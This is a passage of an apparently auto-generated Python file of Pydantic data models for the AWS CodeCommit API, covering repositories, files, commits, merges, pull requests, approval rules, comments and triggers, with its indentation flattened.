beforeBlob: Optional[BlobMetadata] = None
afterBlob: Optional[BlobMetadata] = None
changeType: Optional[ChangeTypeEnum] = None
class DifferenceList(BaseModel):
__root__: List[Difference]
class Overridden(Approved):
pass
class EventDate(LastModifiedDate):
pass
class FileModeTypeEnum(Enum):
EXECUTABLE = 'EXECUTABLE'
NORMAL = 'NORMAL'
SYMLINK = 'SYMLINK'
class File(BaseModel):
"""
Returns information about a file in a repository.
"""
blobId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
fileMode: Optional[FileModeTypeEnum] = None
class FileContent(BaseModel):
__root__: Annotated[str, Field(max_length=6291456)]
class FileList(BaseModel):
__root__: List[File]
class FileMetadata(BaseModel):
"""
A file to be added, updated, or deleted as part of a commit.
"""
absolutePath: Optional[Path] = None
blobId: Optional[ObjectId] = None
fileMode: Optional[FileModeTypeEnum] = None
class FileSize(MaxResults):
pass
class Folder(BaseModel):
"""
Returns information about a folder in a repository.
"""
treeId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
class FolderList(BaseModel):
__root__: List[Folder]
class Blob(AccountId):
pass
class Limit(MaxResults):
pass
class ObjectSize(MaxResults):
pass
class IsMergeable(Approved):
pass
class MergeOptions(BaseModel):
__root__: List[MergeOptionTypeEnum]
class RepositoryTriggersConfigurationId(AccountId):
pass
class HunkContent(AccountId):
pass
class IsHunkConflict(Approved):
pass
class IsMerged(Approved):
pass
class IsMove(Approved):
pass
class LineNumber(MaxResults):
pass
class PullRequestStatusEnum(Enum):
OPEN = 'OPEN'
CLOSED = 'CLOSED'
class PullRequestIdList(BaseModel):
__root__: List[PullRequestId]
class SortByEnum(Enum):
repositoryName = 'repositoryName'
lastModifiedDate = 'lastModifiedDate'
class OrderEnum(Enum):
ascending = 'ascending'
descending = 'descending'
class ResourceArn(AccountId):
pass
class Position(MaxResults):
pass
class RelativeFileVersionEnum(Enum):
BEFORE = 'BEFORE'
AFTER = 'AFTER'
class MergeHunkDetail(BaseModel):
"""
Information about the details of a merge hunk that contains a conflict in a merge or pull request operation.
"""
startLine: Optional[LineNumber] = None
endLine: Optional[LineNumber] = None
hunkContent: Optional[HunkContent] = None
class MergeHunk(BaseModel):
"""
Information about merge hunks in a merge or pull request operation.
"""
isConflict: Optional[IsHunkConflict] = None
source: Optional[MergeHunkDetail] = None
destination: Optional[MergeHunkDetail] = None
base: Optional[MergeHunkDetail] = None
class MergeMetadata(BaseModel):
"""
Returns information about a merge or potential merge between a source reference and a destination reference in a pull request.
"""
isMerged: Optional[IsMerged] = None
mergedBy: Optional[Arn] = None
mergeCommitId: Optional[CommitId] = None
mergeOption: Optional[MergeOptionTypeEnum] = None
class ObjectTypeEnum(Enum):
FILE = 'FILE'
DIRECTORY = 'DIRECTORY'
GIT_LINK = 'GIT_LINK'
SYMBOLIC_LINK = 'SYMBOLIC_LINK'
class PullRequestCreatedEventMetadata(BaseModel):
"""
Metadata about the pull request that is used when comparing the pull request source with its destination.
"""
repositoryName: Optional[RepositoryName] = None
sourceCommitId: Optional[CommitId] = None
destinationCommitId: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
class PullRequestStatusChangedEventMetadata(BaseModel):
"""
Information about a change to the status of a pull request.
"""
pullRequestStatus: Optional[PullRequestStatusEnum] = None
class PullRequestSourceReferenceUpdatedEventMetadata(BaseModel):
"""
Information about an update to the source branch of a pull request.
"""
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
class ReferenceName(AccountId):
pass
class PullRequestTarget(BaseModel):
"""
Returns information about a pull request target.
"""
repositoryName: Optional[RepositoryName] = None
sourceReference: Optional[ReferenceName] = None
destinationReference: Optional[ReferenceName] = None
destinationCommit: Optional[CommitId] = None
sourceCommit: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
mergeMetadata: Optional[MergeMetadata] = None
class SourceFileSpecifier(BaseModel):
"""
Information about a source file that is part of changes made in a commit.
"""
filePath: Path
isMove: Optional[IsMove] = None
class ReactionEmoji(AccountId):
pass
class ReactionUsersList(BaseModel):
__root__: List[Arn]
class ReactionShortCode(AccountId):
pass
class ReactionUnicode(AccountId):
pass
class ReplacementTypeEnum(Enum):
KEEP_BASE = 'KEEP_BASE'
KEEP_SOURCE = 'KEEP_SOURCE'
KEEP_DESTINATION = 'KEEP_DESTINATION'
USE_NEW_CONTENT = 'USE_NEW_CONTENT'
class RepositoryNameIdPair(BaseModel):
"""
Information about a repository name and ID.
"""
repositoryName: Optional[RepositoryName] = None
repositoryId: Optional[RepositoryId] = None
class RepositoryTriggerName(AccountId):
pass
class RepositoryTriggerCustomData(AccountId):
pass
class RepositoryTriggerEventEnum(Enum):
all = 'all'
updateReference = 'updateReference'
createReference = 'createReference'
deleteReference = 'deleteReference'
class RepositoryTriggerExecutionFailureMessage(AccountId):
pass
class RepositoryTriggerExecutionFailure(BaseModel):
"""
A trigger failed to run.
"""
trigger: Optional[RepositoryTriggerName] = None
failureMessage: Optional[RepositoryTriggerExecutionFailureMessage] = None
class RepositoryTriggerExecutionFailureList(BaseModel):
__root__: List[RepositoryTriggerExecutionFailure]
class RepositoryTriggerNameList(BaseModel):
__root__: List[RepositoryTriggerName]
class SetFileModeEntry(BaseModel):
"""
Information about the file mode changes.
"""
filePath: Path
fileMode: FileModeTypeEnum
class SubModule(BaseModel):
"""
Returns information about a submodule reference in a repository folder.
"""
commitId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
class SymbolicLink(File):
"""
Returns information about a symbolic link in a repository folder.
"""
pass
class TagKey(BaseModel):
__root__: Annotated[str, Field(max_length=128, min_length=1)]
class TagKeysList(BaseModel):
__root__: List[TagKey]
class TagValue(BaseModel):
__root__: Annotated[str, Field(max_length=256, min_length=0)]
class Target(BaseModel):
"""
Returns information about a target for a pull request.
"""
repositoryName: RepositoryName
sourceReference: ReferenceName
destinationReference: Optional[ReferenceName] = None
class AssociateApprovalRuleTemplateWithRepositoryInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryName: RepositoryName
class BatchAssociateApprovalRuleTemplateWithRepositoriesOutput(BaseModel):
associatedRepositoryNames: RepositoryNameList
errors: BatchAssociateApprovalRuleTemplateWithRepositoriesErrorsList
class BatchAssociateApprovalRuleTemplateWithRepositoriesInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryNames: RepositoryNameList
class BatchDescribeMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
maxMergeHunks: Optional[MaxResults] = None
maxConflictFiles: Optional[MaxResults] = None
filePaths: Optional[FilePaths] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class BatchDisassociateApprovalRuleTemplateFromRepositoriesOutput(BaseModel):
disassociatedRepositoryNames: RepositoryNameList
errors: BatchDisassociateApprovalRuleTemplateFromRepositoriesErrorsList
class BatchDisassociateApprovalRuleTemplateFromRepositoriesInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryNames: RepositoryNameList
class BatchGetCommitsInput(BaseModel):
commitIds: CommitIdsInputList
repositoryName: RepositoryName
class BatchGetRepositoriesInput(BaseModel):
"""
Represents the input of a batch get repositories operation.
"""
repositoryNames: RepositoryNameList
class CreateApprovalRuleTemplateOutput(BaseModel):
approvalRuleTemplate: ApprovalRuleTemplate
class CreateApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
approvalRuleTemplateContent: ApprovalRuleTemplateContent
approvalRuleTemplateDescription: Optional[ApprovalRuleTemplateDescription] = None
class CreateBranchInput(BaseModel):
"""
Represents the input of a create branch operation.
"""
repositoryName: RepositoryName
branchName: BranchName
commitId: CommitId
class CreatePullRequestApprovalRuleInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
approvalRuleContent: ApprovalRuleContent
class CreateRepositoryInput(BaseModel):
"""
Represents the input of a create repository operation.
"""
repositoryName: RepositoryName
repositoryDescription: Optional[RepositoryDescription] = None
tags: Optional[TagsMap] = None
class CreateUnreferencedMergeCommitOutput(BaseModel):
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
class DeleteApprovalRuleTemplateOutput(BaseModel):
approvalRuleTemplateId: ApprovalRuleTemplateId
class DeleteApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
class DeleteBranchOutput(BaseModel):
"""
Represents the output of a delete branch operation.
"""
deletedBranch: Optional[BranchInfo] = None
class DeleteBranchInput(BaseModel):
"""
Represents the input of a delete branch operation.
"""
repositoryName: RepositoryName
branchName: BranchName
class DeleteCommentContentOutput(BaseModel):
comment: Optional[Comment] = None
class DeleteCommentContentInput(BaseModel):
commentId: CommentId
class DeleteFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
treeId: ObjectId
filePath: Path
class DeleteFileInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
filePath: Path
parentCommitId: CommitId
keepEmptyFolders: Optional[KeepEmptyFolders] = None
commitMessage: Optional[Message] = None
name: Optional[Name] = None
email: Optional[Email] = None
class DeletePullRequestApprovalRuleOutput(BaseModel):
approvalRuleId: ApprovalRuleId
class DeletePullRequestApprovalRuleInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
class DeleteRepositoryOutput(BaseModel):
"""
Represents the output of a delete repository operation.
"""
repositoryId: Optional[RepositoryId] = None
class DeleteRepositoryInput(BaseModel):
"""
Represents the input of a delete repository operation.
"""
repositoryName: RepositoryName
class DescribeMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
maxMergeHunks: Optional[MaxResults] = None
filePath: Path
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class DescribePullRequestEventsInput(BaseModel):
pullRequestId: PullRequestId
pullRequestEventType: Optional[PullRequestEventType] = None
actorArn: Optional[Arn] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class DisassociateApprovalRuleTemplateFromRepositoryInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
repositoryName: RepositoryName
class EvaluatePullRequestApprovalRulesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetApprovalRuleTemplateOutput(CreateApprovalRuleTemplateOutput):
pass
class GetApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
class GetBlobOutput(BaseModel):
"""
Represents the output of a get blob operation.
"""
content: Blob
class GetBlobInput(BaseModel):
"""
Represents the input of a get blob operation.
"""
repositoryName: RepositoryName
blobId: ObjectId
class GetBranchOutput(BaseModel):
"""
Represents the output of a get branch operation.
"""
branch: Optional[BranchInfo] = None
class GetBranchInput(BaseModel):
"""
Represents the input of a get branch operation.
"""
repositoryName: Optional[RepositoryName] = None
branchName: Optional[BranchName] = None
class GetCommentOutput(DeleteCommentContentOutput):
pass
class GetCommentInput(BaseModel):
commentId: CommentId
class GetCommentReactionsInput(BaseModel):
commentId: CommentId
reactionUserArn: Optional[Arn] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommentsForComparedCommitInput(BaseModel):
repositoryName: RepositoryName
beforeCommitId: Optional[CommitId] = None
afterCommitId: CommitId
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommentsForPullRequestInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class GetCommitInput(BaseModel):
"""
Represents the input of a get commit operation.
"""
repositoryName: RepositoryName
commitId: ObjectId
class GetDifferencesOutput(BaseModel):
differences: Optional[DifferenceList] = None
NextToken: Optional[NextToken] = None
class GetDifferencesInput(BaseModel):
repositoryName: RepositoryName
beforeCommitSpecifier: Optional[CommitName] = None
afterCommitSpecifier: CommitName
beforePath: Optional[Path] = None
afterPath: Optional[Path] = None
MaxResults: Optional[Limit] = None
NextToken: Optional[NextToken] = None
class GetFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
filePath: Path
fileMode: FileModeTypeEnum
fileSize: ObjectSize
fileContent: FileContent
class GetFileInput(BaseModel):
repositoryName: RepositoryName
commitSpecifier: Optional[CommitName] = None
filePath: Path
class GetFolderInput(BaseModel):
repositoryName: RepositoryName
commitSpecifier: Optional[CommitName] = None
folderPath: Path
class GetMergeCommitOutput(BaseModel):
sourceCommitId: Optional[ObjectId] = None
destinationCommitId: Optional[ObjectId] = None
baseCommitId: Optional[ObjectId] = None
mergedCommitId: Optional[ObjectId] = None
class GetMergeCommitInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
class GetMergeConflictsInput(BaseModel):
repositoryName: RepositoryName
destinationCommitSpecifier: CommitName
sourceCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
maxConflictFiles: Optional[MaxResults] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
nextToken: Optional[NextToken] = None
class GetMergeOptionsOutput(BaseModel):
mergeOptions: MergeOptions
sourceCommitId: ObjectId
destinationCommitId: ObjectId
baseCommitId: ObjectId
class GetMergeOptionsInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
class GetPullRequestInput(BaseModel):
pullRequestId: PullRequestId
class GetPullRequestApprovalStatesOutput(BaseModel):
approvals: Optional[ApprovalList] = None
class GetPullRequestApprovalStatesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetPullRequestOverrideStateOutput(BaseModel):
overridden: Optional[Overridden] = None
overrider: Optional[Arn] = None
class GetPullRequestOverrideStateInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
class GetRepositoryInput(BaseModel):
"""
Represents the input of a get repository operation.
"""
repositoryName: RepositoryName
class GetRepositoryTriggersInput(BaseModel):
"""
Represents the input of a get repository triggers operation.
"""
repositoryName: RepositoryName
class ListApprovalRuleTemplatesOutput(BaseModel):
approvalRuleTemplateNames: Optional[ApprovalRuleTemplateNameList] = None
nextToken: Optional[NextToken] = None
class ListApprovalRuleTemplatesInput(BaseModel):
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListAssociatedApprovalRuleTemplatesForRepositoryOutput(
ListApprovalRuleTemplatesOutput
):
pass
class ListAssociatedApprovalRuleTemplatesForRepositoryInput(BaseModel):
repositoryName: RepositoryName
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListBranchesOutput(BaseModel):
"""
Represents the output of a list branches operation.
"""
branches: Optional[BranchNameList] = None
nextToken: Optional[NextToken] = None
class ListBranchesInput(BaseModel):
"""
Represents the input of a list branches operation.
"""
repositoryName: RepositoryName
nextToken: Optional[NextToken] = None
class ListPullRequestsOutput(BaseModel):
pullRequestIds: PullRequestIdList
nextToken: Optional[NextToken] = None
class ListPullRequestsInput(BaseModel):
repositoryName: RepositoryName
authorArn: Optional[Arn] = None
pullRequestStatus: Optional[PullRequestStatusEnum] = None
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListRepositoriesInput(BaseModel):
"""
Represents the input of a list repositories operation.
"""
nextToken: Optional[NextToken] = None
sortBy: Optional[SortByEnum] = None
order: Optional[OrderEnum] = None
class ListRepositoriesForApprovalRuleTemplateOutput(BaseModel):
repositoryNames: Optional[RepositoryNameList] = None
nextToken: Optional[NextToken] = None
class ListRepositoriesForApprovalRuleTemplateInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
nextToken: Optional[NextToken] = None
maxResults: Optional[MaxResults] = None
class ListTagsForResourceOutput(BaseModel):
tags: Optional[TagsMap] = None
nextToken: Optional[NextToken] = None
class ListTagsForResourceInput(BaseModel):
resourceArn: ResourceArn
nextToken: Optional[NextToken] = None
class MergeBranchesByFastForwardOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergeBranchesByFastForwardInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
class MergeBranchesBySquashOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergeBranchesByThreeWayOutput(CreateUnreferencedMergeCommitOutput):
pass
class MergePullRequestByFastForwardInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
class OverridePullRequestApprovalRulesInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
overrideStatus: OverrideStatus
class PostCommentReplyOutput(DeleteCommentContentOutput):
pass
class PostCommentReplyInput(BaseModel):
inReplyTo: CommentId
clientRequestToken: Optional[ClientRequestToken] = None
content: Content
class PutCommentReactionInput(BaseModel):
commentId: CommentId
reactionValue: ReactionValue
class PutFileOutput(BaseModel):
commitId: ObjectId
blobId: ObjectId
treeId: ObjectId
class PutFileInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
fileContent: FileContent
filePath: Path
fileMode: Optional[FileModeTypeEnum] = None
parentCommitId: Optional[CommitId] = None
commitMessage: Optional[Message] = None
name: Optional[Name] = None
email: Optional[Email] = None
class PutRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a put repository triggers operation.
"""
configurationId: Optional[RepositoryTriggersConfigurationId] = None
class TagResourceInput(BaseModel):
resourceArn: ResourceArn
tags: TagsMap
class TestRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a test repository triggers operation.
"""
successfulExecutions: Optional[RepositoryTriggerNameList] = None
failedExecutions: Optional[RepositoryTriggerExecutionFailureList] = None
class UntagResourceInput(BaseModel):
resourceArn: ResourceArn
tagKeys: TagKeysList
class UpdateApprovalRuleTemplateContentOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateContentInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
newRuleContent: ApprovalRuleTemplateContent
existingRuleContentSha256: Optional[RuleContentSha256] = None
class UpdateApprovalRuleTemplateDescriptionOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateDescriptionInput(BaseModel):
approvalRuleTemplateName: ApprovalRuleTemplateName
approvalRuleTemplateDescription: ApprovalRuleTemplateDescription
class UpdateApprovalRuleTemplateNameOutput(CreateApprovalRuleTemplateOutput):
pass
class UpdateApprovalRuleTemplateNameInput(BaseModel):
oldApprovalRuleTemplateName: ApprovalRuleTemplateName
newApprovalRuleTemplateName: ApprovalRuleTemplateName
class UpdateCommentOutput(DeleteCommentContentOutput):
pass
class UpdateCommentInput(BaseModel):
commentId: CommentId
content: Content
class UpdateDefaultBranchInput(BaseModel):
"""
Represents the input of an update default branch operation.
"""
repositoryName: RepositoryName
defaultBranchName: BranchName
class UpdatePullRequestApprovalRuleContentInput(BaseModel):
pullRequestId: PullRequestId
approvalRuleName: ApprovalRuleName
existingRuleContentSha256: Optional[RuleContentSha256] = None
newRuleContent: ApprovalRuleContent
class UpdatePullRequestApprovalStateInput(BaseModel):
pullRequestId: PullRequestId
revisionId: RevisionId
approvalState: ApprovalState
class UpdatePullRequestDescriptionInput(BaseModel):
pullRequestId: PullRequestId
description: Description
class UpdatePullRequestStatusInput(BaseModel):
pullRequestId: PullRequestId
pullRequestStatus: PullRequestStatusEnum
class UpdatePullRequestTitleInput(BaseModel):
pullRequestId: PullRequestId
title: Title
class UpdateRepositoryDescriptionInput(BaseModel):
"""
Represents the input of an update repository description operation.
"""
repositoryName: RepositoryName
repositoryDescription: Optional[RepositoryDescription] = None
class UpdateRepositoryNameInput(BaseModel):
"""
Represents the input of an update repository description operation.
"""
oldName: RepositoryName
newName: RepositoryName
class OriginApprovalRuleTemplate(BaseModel):
"""
Returns information about the template that created the approval rule for a pull request.
"""
approvalRuleTemplateId: Optional[ApprovalRuleTemplateId] = None
approvalRuleTemplateName: Optional[ApprovalRuleTemplateName] = None
class ApprovalRule(BaseModel):
"""
Returns information about an approval rule.
"""
approvalRuleId: Optional[ApprovalRuleId] = None
approvalRuleName: Optional[ApprovalRuleName] = None
approvalRuleContent: Optional[ApprovalRuleContent] = None
ruleContentSha256: Optional[RuleContentSha256] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
lastModifiedUser: Optional[Arn] = None
originApprovalRuleTemplate: Optional[OriginApprovalRuleTemplate] = None
class ApprovalRulesList(BaseModel):
__root__: List[ApprovalRule]
class Location(BaseModel):
"""
Returns information about the location of a change or comment in the comparison between two commits or a pull request.
"""
filePath: Optional[Path] = None
filePosition: Optional[Position] = None
relativeFileVersion: Optional[RelativeFileVersionEnum] = None
class CommentsForComparedCommit(BaseModel):
"""
Returns information about comments on the comparison between two commits.
"""
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comments: Optional[Comments] = None
class CommentsForComparedCommitData(BaseModel):
__root__: List[CommentsForComparedCommit]
class CommentsForPullRequest(BaseModel):
"""
Returns information about comments on a pull request.
"""
pullRequestId: Optional[PullRequestId] = None
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comments: Optional[Comments] = None
class CommentsForPullRequestData(BaseModel):
__root__: List[CommentsForPullRequest]
class UserInfo(BaseModel):
"""
Information about the user who made a specified commit.
"""
name: Optional[Name] = None
email: Optional[Email] = None
date: Optional[Date] = None
class Commit(BaseModel):
"""
Returns information about a specific commit.
"""
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
parents: Optional[ParentList] = None
message: Optional[Message] = None
author: Optional[UserInfo] = None
committer: Optional[UserInfo] = None
additionalData: Optional[AdditionalData] = None
class MergeHunks(BaseModel):
__root__: List[MergeHunk]
class FileSizes(BaseModel):
"""
Information about the size of files in a merge or pull request.
"""
source: Optional[FileSize] = None
destination: Optional[FileSize] = None
base: Optional[FileSize] = None
class FileModes(BaseModel):
"""
Information about file modes in a merge or pull request.
"""
source: Optional[FileModeTypeEnum] = None
destination: Optional[FileModeTypeEnum] = None
base: Optional[FileModeTypeEnum] = None
class ObjectTypes(BaseModel):
"""
Information about the type of an object in a merge operation.
"""
source: Optional[ObjectTypeEnum] = None
destination: Optional[ObjectTypeEnum] = None
base: Optional[ObjectTypeEnum] = None
class DeleteFileEntries(BaseModel):
__root__: List[DeleteFileEntry]
class SetFileModeEntries(BaseModel):
__root__: List[SetFileModeEntry]
class FilesMetadata(BaseModel):
__root__: List[FileMetadata]
class TargetList(BaseModel):
__root__: List[Target]
class RepositoryMetadata(BaseModel):
"""
Information about a repository.
"""
accountId: Optional[AccountId] = None
repositoryId: Optional[RepositoryId] = None
repositoryName: Optional[RepositoryName] = None
repositoryDescription: Optional[RepositoryDescription] = None
defaultBranch: Optional[BranchName] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
cloneUrlHttp: Optional[CloneUrlHttp] = None
cloneUrlSsh: Optional[CloneUrlSsh] = None
Arn: Optional[Arn] = None
class Evaluation(BaseModel):
"""
Returns information about the approval rules applied to a pull request and whether conditions have been met.
"""
approved: Optional[Approved] = None
overridden: Optional[Overridden] = None
approvalRulesSatisfied: Optional[ApprovalRulesSatisfiedList] = None
approvalRulesNotSatisfied: Optional[ApprovalRulesNotSatisfiedList] = None
class SymbolicLinkList(BaseModel):
__root__: List[SymbolicLink]
class SubModuleList(BaseModel):
__root__: List[SubModule]
class RepositoryNameIdPairList(BaseModel):
__root__: List[RepositoryNameIdPair]
class PullRequestTargetList(BaseModel):
__root__: List[PullRequestTarget]
class PullRequestMergedStateChangedEventMetadata(BaseModel):
"""
Returns information about the change in the merge state for a pull request event.
"""
repositoryName: Optional[RepositoryName] = None
destinationReference: Optional[ReferenceName] = None
mergeMetadata: Optional[MergeMetadata] = None
class PullRequestEvent(BaseModel):
"""
Returns information about a pull request event.
"""
pullRequestId: Optional[PullRequestId] = None
eventDate: Optional[EventDate] = None
pullRequestEventType: Optional[PullRequestEventType] = None
actorArn: Optional[Arn] = None
pullRequestCreatedEventMetadata: Optional[PullRequestCreatedEventMetadata] = None
pullRequestStatusChangedEventMetadata: Optional[
PullRequestStatusChangedEventMetadata
] = None
pullRequestSourceReferenceUpdatedEventMetadata: Optional[
PullRequestSourceReferenceUpdatedEventMetadata
] = None
pullRequestMergedStateChangedEventMetadata: Optional[
PullRequestMergedStateChangedEventMetadata
] = None
approvalRuleEventMetadata: Optional[ApprovalRuleEventMetadata] = None
approvalStateChangedEventMetadata: Optional[
ApprovalStateChangedEventMetadata
] = None
approvalRuleOverriddenEventMetadata: Optional[
ApprovalRuleOverriddenEventMetadata
] = None
class PutFileEntry(BaseModel):
"""
Information about a file added or updated as part of a commit.
"""
filePath: Path
fileMode: Optional[FileModeTypeEnum] = None
fileContent: Optional[FileContent] = None
sourceFile: Optional[SourceFileSpecifier] = None
class ReactionValueFormats(BaseModel):
"""
Information about the values for reactions to a comment. AWS CodeCommit supports a limited set of reactions.
"""
emoji: Optional[ReactionEmoji] = None
shortCode: Optional[ReactionShortCode] = None
unicode: Optional[ReactionUnicode] = None
class ReactionForComment(BaseModel):
"""
Information about the reaction values provided by users on a comment.
"""
reaction: Optional[ReactionValueFormats] = None
reactionUsers: Optional[ReactionUsersList] = None
reactionsFromDeletedUsersCount: Optional[Count] = None
class ReplaceContentEntry(BaseModel):
"""
Information about a replacement content entry in the conflict of a merge or pull request operation.
"""
filePath: Path
replacementType: ReplacementTypeEnum
content: Optional[FileContent] = None
fileMode: Optional[FileModeTypeEnum] = None
class RepositoryTriggerEventList(BaseModel):
__root__: List[RepositoryTriggerEventEnum]
class RepositoryTrigger(BaseModel):
"""
Information about a trigger for a repository.
"""
name: RepositoryTriggerName
destinationArn: Arn
customData: Optional[RepositoryTriggerCustomData] = None
branches: Optional[BranchNameList] = None
events: RepositoryTriggerEventList
class CreateCommitOutput(BaseModel):
commitId: Optional[ObjectId] = None
treeId: Optional[ObjectId] = None
filesAdded: Optional[FilesMetadata] = None
filesUpdated: Optional[FilesMetadata] = None
filesDeleted: Optional[FilesMetadata] = None
class CreatePullRequestInput(BaseModel):
title: Title
description: Optional[Description] = None
targets: TargetList
clientRequestToken: Optional[ClientRequestToken] = None
class CreatePullRequestApprovalRuleOutput(BaseModel):
approvalRule: ApprovalRule
class CreateRepositoryOutput(BaseModel):
"""
Represents the output of a create repository operation.
"""
repositoryMetadata: Optional[RepositoryMetadata] = None
class EvaluatePullRequestApprovalRulesOutput(BaseModel):
evaluation: Evaluation
class GetCommentsForComparedCommitOutput(BaseModel):
commentsForComparedCommitData: Optional[CommentsForComparedCommitData] = None
nextToken: Optional[NextToken] = None
class GetCommentsForPullRequestOutput(BaseModel):
commentsForPullRequestData: Optional[CommentsForPullRequestData] = None
nextToken: Optional[NextToken] = None
class GetCommitOutput(BaseModel):
"""
Represents the output of a get commit operation.
"""
commit: Commit
class GetFolderOutput(BaseModel):
commitId: ObjectId
folderPath: Path
treeId: Optional[ObjectId] = None
subFolders: Optional[FolderList] = None
files: Optional[FileList] = None
symbolicLinks: Optional[SymbolicLinkList] = None
subModules: Optional[SubModuleList] = None
class GetRepositoryOutput(CreateRepositoryOutput):
"""
Represents the output of a get repository operation.
"""
pass
class ListRepositoriesOutput(BaseModel):
"""
Represents the output of a list repositories operation.
"""
repositories: Optional[RepositoryNameIdPairList] = None
nextToken: Optional[NextToken] = None
class PostCommentForComparedCommitOutput(BaseModel):
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comment: Optional[Comment] = None
class PostCommentForComparedCommitInput(BaseModel):
repositoryName: RepositoryName
beforeCommitId: Optional[CommitId] = None
afterCommitId: CommitId
location: Optional[Location] = None
content: Content
clientRequestToken: Optional[ClientRequestToken] = None
class PostCommentForPullRequestOutput(BaseModel):
repositoryName: Optional[RepositoryName] = None
pullRequestId: Optional[PullRequestId] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
beforeBlobId: Optional[ObjectId] = None
afterBlobId: Optional[ObjectId] = None
location: Optional[Location] = None
comment: Optional[Comment] = None
class PostCommentForPullRequestInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
beforeCommitId: CommitId
afterCommitId: CommitId
location: Optional[Location] = None
content: Content
clientRequestToken: Optional[ClientRequestToken] = None
